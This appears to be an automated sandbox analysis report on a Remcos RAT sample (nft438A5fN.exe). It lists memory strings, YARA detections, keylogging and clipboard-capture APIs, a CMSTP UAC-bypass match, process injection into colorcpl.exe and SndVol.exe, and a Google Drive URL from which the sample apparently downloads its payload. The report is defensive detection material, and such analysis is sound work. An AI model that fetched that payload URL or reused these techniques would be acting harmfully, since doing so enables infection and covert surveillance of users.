Source: nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/dow
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/t
Source: nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,00000000

11_2_0320A2F3

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0320B749

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		11_2_032168FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		21_2_02E968FC

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0320B749

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_0320A41B

Yara detected Keylogger Generic

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321CA73 SystemParametersInfoW,		11_2_0321CA73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9CA73 SystemParametersInfoW,		21_2_02E9CA73

System Summary

Malicious sample detected (through community Yara rule)

Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8730 NtQueueApcThread,	0_2_02CA8730
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7A2C NtAllocateVirtualMemory,	0_2_02CA7A2C
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02CADC8C
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CADC04
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7D78 NtWriteVirtualMemory,	0_2_02CA7D78
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02CADD70
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8D6E GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02CA8D6E
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8D70 GetThreadContext,SetThreadContext,NtResumeThread,	0_2_02CA8D70
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA7A2A NtAllocateVirtualMemory,	0_2_02CA7A2A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02CADBB0
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	7_2_00054823
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	7_2_0005643A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	7_2_00067460
Source: C:\Users\Public\alpha.pif	Code function: 7_2_000564CA NtQueryInformationToken,	7_2_000564CA
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00056500 NtQueryInformationToken,NtQueryInformationToken,	7_2_00056500
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006A135 NtSetInformationFile,	7_2_0006A135
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	7_2_0006C1FA
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	7_2_00044E3B
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	7_2_00054759
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	15_2_00054823
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	15_2_0005643A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	15_2_00067460
Source: C:\Users\Public\alpha.pif	Code function: 15_2_000564CA NtQueryInformationToken,	15_2_000564CA
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00056500 NtQueryInformationToken,NtQueryInformationToken,	15_2_00056500
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006A135 NtSetInformationFile,	15_2_0006A135
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	15_2_0006C1FA
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	15_2_00044E3B
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	15_2_00054759
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C58730 NtQueueApcThread,	19_2_02C58730
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57A2C NtAllocateVirtualMemory,	19_2_02C57A2C
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C5DD70 NtOpenFile,NtReadFile,	19_2_02C5DD70
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57D78 NtWriteVirtualMemory,	19_2_02C57D78
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: 19_2_02C57A2A NtAllocateVirtualMemory,	19_2_02C57A2A

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.pif

7_2_00044C10

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA8788 CreateProcessAsUserW,

0_2_02CA8788

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,		11_2_032167EF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,		21_2_02E967EF

Creates files inside the system directory

Source: C:\Users\Public\alpha.pif	File created: C:\Windows			Jump to behavior
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64			Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.pif

File deleted: C:\Windows \SysWOW64

Detected potential crypto function

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C920C4	0_2_02C920C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3671B	0_2_02D3671B
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3E42F	0_2_02D3E42F
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4E5FA	0_2_02D4E5FA
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3E9BE	0_2_02D3E9BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6A93B	0_2_02D6A93B
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D64FD9	0_2_02D64FD9
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4AF67	0_2_02D4AF67
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3F067	0_2_02D3F067
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D3F1D0	0_2_02D3F1D0
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D35183	0_2_02D35183
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D556AC	0_2_02D556AC
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6B769	0_2_02D6B769
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5547D	0_2_02D5547D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D2B595	0_2_02D2B595
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D55B38	0_2_02D55B38
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D558DB	0_2_02D558DB
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D5D800	0_2_02D5D800
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4FD80	0_2_02D4FD80
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004540A	7_2_0004540A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00044C10	7_2_00044C10
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054875	7_2_00054875
Source: C:\Users\Public\alpha.pif	Code function: 7_2_000474B1	7_2_000474B1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00049144	7_2_00049144
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006695A	7_2_0006695A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00064191	7_2_00064191
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004EE03	7_2_0004EE03
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00047A34	7_2_00047A34
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00046E57	7_2_00046E57
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004D660	7_2_0004D660
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00055A86	7_2_00055A86
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0006769E	7_2_0006769E
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00053EB3	7_2_00053EB3
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00046B20	7_2_00046B20
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050740	7_2_00050740
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050BF0	7_2_00050BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E34B	11_2_0323E34B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032533AB	11_2_032533AB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03246270	11_2_03246270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E11C	11_2_0323E11C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321F18B	11_2_0321F18B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032381E8	11_2_032381E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032541D9	11_2_032541D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03214005	11_2_03214005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323706A	11_2_0323706A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03238768	11_2_03238768
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032387F0	11_2_032387F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03237566	11_2_03237566
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323E5A8	11_2_0323E5A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0322742E	11_2_0322742E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321DBF3	11_2_0321DBF3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324DA49	11_2_0324DA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03227AD7	11_2_03227AD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323797E	11_2_0323797E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032339D7	11_2_032339D7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03226E9F	11_2_03226E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03235EEB	11_2_03235EEB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0323DEED	11_2_0323DEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03237DB3	11_2_03237DB3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03227C40	11_2_03227C40
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004540A	15_2_0004540A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00044C10	15_2_00044C10
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054875	15_2_00054875
Source: C:\Users\Public\alpha.pif	Code function: 15_2_000474B1	15_2_000474B1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00049144	15_2_00049144
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006695A	15_2_0006695A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00064191	15_2_00064191
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004EE03	15_2_0004EE03
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00047A34	15_2_00047A34
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00046E57	15_2_00046E57
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004D660	15_2_0004D660
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00055A86	15_2_00055A86
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0006769E	15_2_0006769E
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00053EB3	15_2_00053EB3
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00046B20	15_2_00046B20
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050740	15_2_00050740
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050BF0	15_2_00050BF0
Source: C:\Users\Public\xpha.pif	Code function: 16_2_000F1E26	16_2_000F1E26
